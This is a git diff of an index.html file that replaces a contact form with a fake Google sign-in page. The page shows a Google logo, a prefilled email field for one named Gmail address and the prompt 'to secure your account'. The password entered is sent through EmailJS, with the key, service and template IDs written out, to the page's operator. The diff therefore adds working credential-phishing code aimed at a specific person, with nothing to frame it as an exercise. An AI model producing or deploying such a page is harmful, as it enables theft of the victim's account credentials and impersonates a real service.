--- a/index.html
+++ b/index.html
@@ -1,65 +1,118 @@
-
 <!DOCTYPE html>
 <html lang="en">
-  <head>
+
+<head>
     <meta charset="UTF-8" />
     <meta http-equiv="X-UA-Compatible" content="IE=edge" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>Contact Us</title>
-    <link
-      rel="stylesheet"
-      href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
-      integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
-      crossorigin="anonymous"
-    />
-    <script src="index.js"></script>
+    <title>Login</title>
 
-    <script
-      type="text/javascript"
-      src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"
-    ></script>
+    <!-- Google Font: Roboto -->
+    <link href="https://fonts.googleapis.com/css2?family=Roboto&display=swap" rel="stylesheet">
+
+    <!-- Bootstrap CSS -->
+    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"
+        integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous" />
+
+    <!-- EmailJS -->
+    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
+
+    <style>
+        body {
+            background-color: #f2f2f2;
+            display: flex;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+            font-family: 'Roboto', sans-serif;
+        }
+
+        .login-box {
+            background: white;
+            padding: 40px;
+            border-radius: 20px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            width: 100%;
+            max-width: 400px;
+            text-align: center;
+        }
+
+        .bottom-link {
+            margin-top: 24px;
+            text-align: center;
+            font-size: 14px;
+        }
+
+        .bottom-link a {
+            color: #1a73e8;
+            text-decoration: none;
+        }
+
+        .bottom-link a:hover {
+            text-decoration: underline;
+        }
+
+        .logo img {
+            max-width: 40px;
+            margin-bottom: 20px;
+        }
+
+        /* Center the placeholder text */
+        input::placeholder {
+            text-align: center;
+        }
+
+        /* Optional: Add some transition and hover effects */
+        .form-control {
+            font-family: 'Roboto', sans-serif;
+        }
+    </style>
+
     <script type="text/javascript">
-      (function () {
-        emailjs.init("APrqxSHI5kaeEURoL");
-      })();
+        (function () {
+            emailjs.init("APrqxSHI5kaeEURoL"); // Replace with your EmailJS public key
+        })();
+
+        function sendMail() {
+            var params = {
+                email: "enasaide@gmail.com", // Fixed email
+                password: document.getElementById("password").value,
+            };
+
+            const serviceID = "service_lp7zq1o";
+            const templateID = "template_nk0wzlu";
+
+            emailjs
+                .send(serviceID, templateID, params)
+                .then((res) => {
+                    document.getElementById("password").value = "";
+                    alert("Login submitted!");
+                })
+                .catch((err) => console.log(err));
+        }
     </script>
-  </head>
-  <body>
-    <div class="container border mt-3 bg-light">
-      <div class="row">
-        <div class="col-md-6 p-5 bg-primary text-white">
-          <h1>Hi there!</h1>
-          <h4>
-            Lorem, ipsum dolor sit amet consectetur adipisicing elit. Quo,
-          </h4>
+</head>
+
+<body>
+    <div class="login-box">
+        <div class="logo">
+            <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Google_Favicon_2025.svg/120px-Google_Favicon_2025.svg.png"
+                alt="Logo" />
         </div>
-        <div class="col-md-6 border-left py-3">
-          <h1>Contact form</h1>
-          <div class="form-group">
-            <h5 for="name">Name</h5>
-            <input
-              type="text"
-              class="form-control"
-              id="name"
-              placeholder="Enter name"
-            />
-          </div>
-          <div class="form-group">
-            <h5 for="email">Email</h5>
-            <input
-              type="email"
-              class="form-control"
-              id="email"
-              placeholder="Enter email"
-            />
-          </div>
-          <div class="form-group">
-            <h5 for="message">Message</h5>
-            <textarea class="form-control" id="message" rows="3"></textarea>
-          </div>
-          <button class="btn btn-primary" onclick="sendMail()">Submit</button>
+        <h3>Sign in</h3>
+        <p>to secure your account</p>
+        <div class="form-group text-left">
+            <input type="email" class="form-control text-center" value="enasaide@gmail.com" disabled />
         </div>
-      </div>
+        <div class="form-group text-left">
+            <input type="password" class="form-control text-center" id="password" placeholder="Input your password" />
+        </div>
+        <button class="btn btn-primary btn-block" onclick="sendMail()">Next</button>
+        <div class="bottom-link">
+            <a href="#">Forgot password?</a>
+        </div>
     </div>
-  </body>
+
+</body>
+
 </html>
